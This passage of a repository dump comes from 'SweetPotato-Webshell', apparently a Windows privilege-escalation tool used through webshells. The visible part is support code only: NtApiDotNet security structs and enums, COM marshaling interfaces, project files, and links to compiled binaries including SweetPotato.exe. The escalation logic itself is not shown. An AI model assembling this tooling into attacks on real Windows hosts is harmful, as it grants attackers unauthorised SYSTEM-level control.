9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct SecPkgContext_ClientSpecifiedTarget
22 | {
23 | public IntPtr sTargetName;
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecPkgContext_SessionKey.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct SecPkgContext_SessionKey
22 | {
23 | public int SessionKeyLength;
24 | public IntPtr SessionKey;
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecPkgInfo.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Authentication;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | #pragma warning disable 1591
21 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
22 | internal struct SecPkgInfo
23 | {
24 | public SecPkgCapabilityFlag fCapabilities;
25 | public short wVersion;
26 | public short wRPCID;
27 | public int cbMaxToken;
28 | [MarshalAs(UnmanagedType.LPWStr)]
29 | public string Name;
30 | [MarshalAs(UnmanagedType.LPWStr)]
31 | public string Comment;
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecStatusCode.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Native
16 | {
17 | #pragma warning disable 1591
18 | internal enum SecStatusCode : uint
19 | {
20 | Success = 0,
21 | ContinueNeeded = 0x00090312,
22 | CompleteNeeded = 0x00090313,
23 | CompleteAndContinue = 0x00090314,
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecWinNtAuthIdentityFlags.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Native
16 | {
17 | #pragma warning disable 1591
18 | internal enum SecWinNtAuthIdentityFlags
19 | {
20 | Ansi = 0x1,
21 | Unicode = 0x2,
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecureStringMarshal.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 | using System.Security;
18 |
19 | namespace NtApiDotNet.Win32.Security.Native
20 | {
21 | #pragma warning disable 1591
22 | [StructLayout(LayoutKind.Sequential)]
23 | internal struct SecureStringMarshal : IDisposable
24 | {
25 | public IntPtr Ptr;
26 |
27 | public SecureStringMarshal(SecureString s)
28 | {
29 | Ptr = Marshal.SecureStringToBSTR(s);
30 | }
31 |
32 | public void Dispose()
33 | {
34 | if (Ptr != IntPtr.Zero)
35 | {
36 | Marshal.ZeroFreeBSTR(Ptr);
37 | }
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/TOKEN_SOURCE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 | using System.Text;
18 |
19 | namespace NtApiDotNet.Win32.Security.Native
20 | {
21 | [StructLayout(LayoutKind.Sequential)]
22 | internal class TOKEN_SOURCE
23 | {
24 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
25 | public byte[] SourceName;
26 | public Luid SourceIdentifier;
27 |
28 | public TOKEN_SOURCE(string source_name)
29 | {
30 | SourceName = Encoding.ASCII.GetBytes(source_name);
31 | Array.Resize(ref SourceName, 8);
32 | SourceIdentifier = new Luid();
33 | }
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Policy/AccountRightLogonType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Policy
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// List of account rights. Not the same as privileges.
20 | ///
21 | public enum AccountRightLogonType
22 | {
23 | SeInteractiveLogonRight,
24 | SeNetworkLogonRight,
25 | SeBatchLogonRight,
26 | SeServiceLogonRight,
27 | SeRemoteInteractiveLogonRight,
28 | SeDenyInteractiveLogonRight,
29 | SeDenyNetworkLogonRight,
30 | SeDenyBatchLogonRight,
31 | SeDenyServiceLogonRight,
32 | SeDenyRemoteInteractiveLogonRight,
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Policy/LsaPolicyAccessRights.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32.Security.Policy
18 | {
19 | [Flags]
20 | internal enum LsaPolicyAccessRights : uint
21 | {
22 | ViewLocalInformation = 0x00000001,
23 | ViewAuditInformation = 0x00000002,
24 | GetPrivateInformation = 0x00000004,
25 | TrustAdmin = 0x00000008,
26 | CreateAccount = 0x00000010,
27 | CreateSecret = 0x00000020,
28 | CreatePrivilege = 0x00000040,
29 | SetDefaultQuotaLimits = 0x00000080,
30 | SetAuditRequirements = 0x00000100,
31 | AuditLogAdmin = 0x00000200,
32 | ServerAdmin = 0x00000400,
33 | LookupNames = 0x00000800,
34 | Notification = 0x00001000,
35 | GenericRead = GenericAccessRights.GenericRead,
36 | GenericWrite = GenericAccessRights.GenericWrite,
37 | GenericExecute = GenericAccessRights.GenericExecute,
38 | GenericAll = GenericAccessRights.GenericAll,
39 | Delete = GenericAccessRights.Delete,
40 | ReadControl = GenericAccessRights.ReadControl,
41 | WriteDac = GenericAccessRights.WriteDac,
42 | WriteOwner = GenericAccessRights.WriteOwner,
43 | Synchronize = GenericAccessRights.Synchronize,
44 | MaximumAllowed = GenericAccessRights.MaximumAllowed,
45 | AccessSystemSecurity = GenericAccessRights.AccessSystemSecurity,
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/WnfServiceTriggerInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Linq;
17 |
18 | namespace NtApiDotNet.Win32
19 | {
20 | #pragma warning disable 1591
21 | public class WnfServiceTriggerInformation : ServiceTriggerInformation
22 | {
23 | public NtWnf Name { get; }
24 |
25 | internal WnfServiceTriggerInformation(SERVICE_TRIGGER trigger)
26 | : base(trigger)
27 | {
28 | var data = CustomData.FirstOrDefault();
29 | if (data?.RawData?.Length != 8)
30 | {
31 | return;
32 | }
33 |
34 | Name = NtWnf.Open(BitConverter.ToUInt64(data.RawData, 0), true, false).GetResultOrDefault();
35 | }
36 |
37 | public override string ToString()
38 | {
39 | return base.ToString();
40 | }
41 | }
42 | #pragma warning restore
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpPotato")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpPotato")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/SweetPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29509.3
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NtApiDotNet", "NtApiDotNet\NtApiDotNet.csproj", "{6AEB5004-6093-4C23-AEAE-911D64CACC58}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Any CPU = Debug|Any CPU
13 | Release|Any CPU = Release|Any CPU
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Release|Any CPU.Build.0 = Release|Any CPU
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/.signature.p7s
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/build/Costura.Fody.props:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Costura
5 |
6 |
7 |
8 |
9 | Contains methods for interacting with the Costura system.
10 |
11 |
12 |
13 |
14 | Call this to Initialize the Costura system.
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/.signature.p7s
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/Fody.6.0.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/Fody.6.0.0.nupkg
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Fody.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyCommon.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyCommon.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Fody.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/IEnumSTATSTG.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport]
6 | [Guid("0000000d-0000-0000-C000-000000000046")]
7 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
8 | public interface IEnumSTATSTG {
9 | // The user needs to allocate an STATSTG array whose size is celt.
10 | [PreserveSig]
11 | uint
12 | Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched);
13 |
14 | void Skip(uint celt);
15 |
16 | void Reset();
17 |
18 | [return: MarshalAs(UnmanagedType.Interface)]
19 | IEnumSTATSTG Clone();
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/ILockBytes.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComVisible(false)]
6 | [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
7 | public interface ILockBytes {
8 | //Note: These two by(reference 32-bit integers (ULONG) could be used as return values instead,
9 | // but they are not tagged [retval] in the IDL, so for consitency's sake...
10 | void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
11 | void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
12 | void Flush();
13 | void SetSize(long cb);
14 | void LockRegion(long libOffset, long cb, int dwLockType);
15 | void UnlockRegion(long libOffset, long cb, int dwLockType);
16 | void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);
17 |
18 | }
19 |
20 |
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/IMarshal.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 |
6 | [Guid("00000003-0000-0000-C000-000000000046")]
7 | [InterfaceType(1)]
8 | [ComConversionLoss]
9 | [ComImport]
10 | public interface IMarshal {
11 |
12 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid);
13 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize);
14 | void MarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS);
15 | void UnmarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, out IntPtr ppv);
16 | void ReleaseMarshalData([MarshalAs(28)] [In] IStream pstm);
17 | void DisconnectObject([In] uint dwReserved);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/IStream.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
6 | public interface IStream {
